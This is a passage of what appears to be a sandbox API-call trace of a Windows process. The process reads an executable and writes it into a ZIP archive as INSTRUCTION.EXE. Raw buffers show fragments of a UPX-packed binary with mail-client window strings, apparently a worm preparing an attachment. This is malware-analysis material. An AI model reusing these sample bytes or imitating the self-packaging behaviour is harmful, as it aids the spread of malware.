SUCCESS | 0x00000000 | |
| 07:45:03,165 | 1592 | NtReadFile |
Buffer => \x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae\x9c\xafN\xfe\x8eaEP\xff\xad\xfeKepj\x80\xe4}\x06'\xc0Q\x9e\xec\xe27=\xa5 \xd8\xfb\xff_\xf8j\x07\xcc\xc3\x06\xf21\xfa\x9e\xb3\xfbG\x12 k}GE\x01\x9eB FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,165 | 1592 | NtWriteFile |
Buffer => \x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae\x9c\xafN\xfe\x8eaEP\xff\xad\xfeKepj\x80\xe4}\x06'\xc0Q\x9e\xec\xe27=\xa5 \xd8\xfb\xff_\xf8j\x07\xcc\xc3\x06\xf21\xfa\x9e\xb3\xfbG\x12 k}GE\x01\x9eB FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,175 | 1592 | NtReadFile |
Buffer => a\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2\x86E\xc2\x086\xb0@\x8e\xa8
\x97\xd8\xba\xef\x16\x1f\xc8\xb6\xf85\xa9\xcb)m\xcd@6\xc1\xc2o\xf5\xb6\xc1~@V\xcaF\xcb\x1eET\xa96\xf8\xfd\xbf\x0e\x81Q\xc7\x85h\xb9\xc1 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,175 | 1592 | NtWriteFile |
Buffer => a\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2\x86E\xc2\x086\xb0@\x8e\xa8
\x97\xd8\xba\xef\x16\x1f\xc8\xb6\xf85\xa9\xcb)m\xcd@6\xc1\xc2o\xf5\xb6\xc1~@V\xcaF\xcb\x1eET\xa96\xf8\xfd\xbf\x0e\x81Q\xc7\x85h\xb9\xc1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,175 | 1592 | NtReadFile |
Buffer => z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b`.data\x98#\xeeB\xba\xc1\xfb"'v@\xbd\xcd`\x1b\x85.\xe5 \x00\xc3\xc0\x06|\xbf){4'@\x1b\xb0{
\x94\x00\x00JA< \x00\x00\x00\xff\x00\x00\x00\x00\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,175 | 1592 | NtWriteFile |
Buffer => z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b`.data\x98#\xeeB\xba\xc1\xfb"'v@\xbd\xcd`\x1b\x85.\xe5 \x00\xc3\xc0\x06|\xbf){4'@\x1b\xb0{
\x94\x00\x00JA< \x00\x00\x00\xff\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,175 | 1592 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x000\x00\xe0\xc0\x00\x00(\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x80\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,175 | 1592 | NtWriteFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x000\x00\xe0\xc0\x00\x00(\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x80\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,185 | 1592 | NtReadFile |
Buffer => \x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xe0\x03\x00\x00\xf0\x07\x00\x00\xf8\x0f\x00\x00\xfc\x1f\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xf0\xc4\x00\x00\x00\x00\x01\x00\x02\x00 \x10\x00\x01\x00\x04\x00\xe8\x02 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,185 | 1592 | NtWriteFile |
Buffer => \x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xe0\x03\x00\x00\xf0\x07\x00\x00\xf8\x0f\x00\x00\xfc\x1f\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xf0\xc4\x00\x00\x00\x00\x01\x00\x02\x00 \x10\x00\x01\x00\x04\x00\xe8\x02 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,185 | 1592 | NtReadFile |
Buffer =>
\xf9pu\xff\x87\x8f\x81
\xea\xae\xdc\xf5\xd5\xae\xa8\xf5#\xba:
\xe1\x9a\xf5\x08#\xbb\xf5XQ\x8b\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,185 | 1592 | NtWriteFile |
Buffer =>
\xf9pu\xff\x87\x8f\x81
\xea\xae\xdc\xf5\xd5\xae\xa8\xf5#\xba:
\xe1\x9a\xf5\x08#\xbb\xf5XQ\x8b\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,185 | 1592 | NtReadFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x91\xfb[\xfaa\xe0 \xd8\xc5\xef\xbc\xd1~\xb8%\x13uA!\x9e\xf1\x82\x01\xebd\x85\xa4\x0en%L\x9a\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3v FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,185 | 1592 | NtWriteFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x91\xfb[\xfaa\xe0 \xd8\xc5\xef\xbc\xd1~\xb8%\x13uA!\x9e\xf1\x82\x01\xebd\x85\xa4\x0en%L\x9a\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3v FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,185 | 1592 | NtReadFile |
Buffer => FileHandle => 0x000001e0 |
FAILURE | 3221225489 | |
| 07:45:03,185 | 1592 | NtWriteFile |
Buffer => PK\x01\x02\x14\x00
\x00\x00\x00\x00\x00\xa1\x95\xde0\xc5\x19\xd8\x01\xc0p\x00\x00\xc0p\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,185 | 1592 | NtWriteFile |
Buffer => INSTRUCTION.EXE FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,185 | 1592 | NtWriteFile |
Buffer => PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00=\x00\x00\x00\xedp\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | DeleteFileA |
FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp5.tmp |
SUCCESS | 0x00000001 | |
| 07:45:03,205 | 1592 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp6.tmp DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtQueryInformationFile |
FileHandle => 0x000001e0 FileInformation => \x00\x80\x00\x00\x00\x00\x00\x00@q\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp6.tmp DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => PK\x03\x04
\x00\x00\x00\x00\x00\xa1\x95\xde0\xc5\x19\xd8\x01\xc0p\x00\x00\xc0p\x00\x00\x0f\x00\x00\x00INSTRUCTION.EXEMZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x001.24\x00UPX!\x0c \x02 \x19\xfb\x87H\x91\xa6q\xb5\x12\xc6\x00\x00\xfb\\x00\x00\x00\x9e\x00\x00&\x01\x00w\xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDec\x00\xa3v\x00O\x9f\x00S\xdd FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => \xce\xf2\xd8$\x0c\x07\xc8\xcf\x9e\x1dd\xc0\xb8$g\xb4$o\xac$ '\xdf%
\x1f%|<{\xf2\xecL$\xf7h P\x1do\xd8\x19\xc1V\x89e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{!\xb0\xdd\xe0\x16BbeL|w FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => wi(t\x0e.\x8d\x00\x05@$F|OZ)\x02
Gf\xe8\x80\xc0\x9a\xdb^\xc2F/\xd8 \xc9-a\xf8N\x15\x90\xe5\x95o\x19\xe2\xb0\x81\xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A\xfa\xcd\xe1\xc0\xc0R\xa3s\x11\x97 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => 23456\x86\x1e\x04\xf8789+/\xc7X-Pf\xa9\x956n\x02ty 3o\x0e\xd3\xefc\xc0^\xc9\x15N1l\x1a0#\x1ex\x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18/\xde\x18\x17\xb96s\xf0\x99\xd8 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => j\x01\xb4\xd9\xdc\xd6\x8e}Xw\x05T-\xb70\xd6v\x1d\x02\xf7\xec^@\xcc\xc1,\x17\xcam\xc1J\xc2W0\xd4\xfd\xc6h\x04\xb9]6t\xcbP\xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
